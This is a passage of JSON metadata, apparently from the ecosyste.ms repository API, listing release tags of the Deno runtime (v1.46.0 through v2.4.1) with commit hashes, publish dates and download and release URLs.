at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1